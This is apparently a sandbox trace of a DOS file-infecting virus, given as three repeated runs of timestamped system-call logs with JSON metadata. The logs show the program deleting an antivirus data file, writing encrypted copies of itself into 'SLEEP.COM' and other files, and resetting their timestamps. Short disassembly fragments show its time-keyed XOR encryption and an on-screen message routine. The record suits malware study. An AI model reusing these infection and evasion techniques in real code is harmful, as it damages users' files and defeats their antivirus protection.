2018-12-25T11:42:59.408116283Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.420378661Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.425094534Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.431035671Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.815336469Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.820676488Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.832435624Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.83482236Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:42:59.838168669Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.841115551Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.846030301Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.856113898Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.859844432Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.86194339Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.866620043Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.867898929Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.874244588Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.881069018Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.884673142Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.888296718Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.920213461Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.931739471Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.940806897Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.942623435Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.945624982Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.948550982Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.952126564Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.961015594Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.965029567Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.96714497Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.974663567Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.97663262Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:42:59.986542381Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:42:59.991881388Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.99517363Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.006584801Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.013990067Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.021071273Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.023934639Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.026968287Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.029553894Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.033785736Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.042865796Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.046181801Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.048258608Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.056489665Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.058572132Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.067087354Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.072699349Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.075789119Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.086400933Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.094527649Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.101101453Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.102740181Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.10680564Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.109212074Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.112662103Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.122531073Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.130646905Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.132559382Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.143238988Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.145119039Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.153767833Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.159997795Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.163445775Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.17516167Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.184006694Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.192452678Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.194470064Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.197648859Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.201642631Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.205312105Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.21454841Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.218988932Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.2213574Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.229574659Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.232463965Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.241806537Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.247472305Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.251107107Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.26364491Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.271375686Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.279126795Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.281614201Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.284920446Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.287363083Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.298188211Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.307883188Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.310959015Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.313413109Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.321447688Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.323542444Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.333930169Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.339885813Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.343357344Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.357141588Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.364739228Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.373655422Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.375791641Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.380008338Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.385101664Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.388919335Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.401690911Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.404876186Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.406864814Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.41694929Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.418759634Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.427810863Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.43454648Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.437680982Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.449537287Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.458995989Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.466759472Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.468883304Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.477444304Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.484164589Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.487265669Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.492305002Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.497190911Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.509247396Z 59 PC: 12b1b | Change current directory
2018-12-25T11:43:00.511666602Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
0x12b22: ja 0x12b4c
0x12b24: nop
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
0x12b2c: lea si, word ptr [bp + 0x3c2]
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.51548907Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1188,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.402411304Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.404529047Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.40774272Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.414073126Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.421779014Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.431129804Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.437993044Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.444771806Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.451575497Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.458031357Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.467208751Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.474712519Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.816488557Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.832985147Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.862264757Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.864281942Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:42:59.867461261Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.870867421Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.88185027Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.891266522Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.894332703Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.896679511Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.903966628Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.905754074Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.915835407Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.92153602Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.924982917Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.9284209Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.940417989Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.948608427Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.957002316Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.958548865Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.961180159Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.965577057Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.969447181Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.979502227Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.983037081Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.98473163Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.993013159Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.995221441Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.005860809Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.011064385Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.014076563Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.025666622Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.033653199Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.04148242Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.044608619Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.047873638Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.050742778Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.055538901Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.064953186Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.069382113Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.07229745Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.079807438Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.081925975Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.091309871Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.0982132Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.101543989Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.112846639Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.121924306Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.129702831Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.131800009Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.136776354Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.140100848Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.143853529Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.154168817Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.158043136Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.160100036Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.167948924Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.171230453Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.180436283Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.186142558Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.190775569Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.202566492Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.210460703Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.218849504Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.221311261Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.22450112Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.228245957Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.232043395Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.241399054Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.244853206Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.247900405Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.255384703Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.257078026Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.266920878Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.273367013Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.276877927Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.28894556Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.298497378Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.306176061Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.309031419Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.312237705Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.315068421Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.32600607Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.336071821Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.339459955Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.341646324Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.349533281Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.351548619Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.360638503Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.366762599Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.3700354Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.38204684Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.390827073Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.398893034Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.401823344Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.406210619Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.409002943Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.412734563Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.422909503Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.426317871Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.428308123Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.436830404Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.438682443Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.447557324Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.454283696Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.457665445Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.469843043Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.478412398Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.482374288Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.484521183Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.493389944Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.500118801Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.502272182Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.507331518Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.517503284Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.529484832Z 59 PC: 12b1b | Change current directory
2018-12-25T11:43:00.531906971Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
0x12b22: ja 0x12b4c
0x12b24: nop
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
0x12b2c: lea si, word ptr [bp + 0x3c2]
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.535791912Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1188,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.422592895Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.423912224Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.426910666Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.433464415Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.445630954Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.452788857Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.459618751Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.465999921Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.47338764Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.4857388Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.497471495Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.505289582Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.820062301Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.826374712Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.833204634Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.834695659Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:42:59.837030043Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.839222443Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.842235834Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.850843153Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.853450324Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.85862702Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.873310298Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.875911447Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.892276409Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.896585232Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.89873794Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.903085641Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.910979246Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.916198785Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.922054918Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.923377942Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.925390922Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.927262628Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.930867276Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.93706166Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.94012597Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.943280465Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.947887652Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.9495988Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:42:59.955841666Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:42:59.962217501Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.965751517Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.979899344Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.987922329Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.995395272Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.997581669Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.000746189Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.00334474Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.007048642Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.016417772Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.019724509Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.021554522Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.029498128Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.031333048Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.040891015Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.047810737Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.05095083Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.062234138Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.070158988Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.077476556Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.078903852Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.082157439Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.085110321Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.088478582Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.098343643Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.10218713Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.103674976Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.111142867Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.113023961Z 62 PC: 12cbe | Close file (See above)
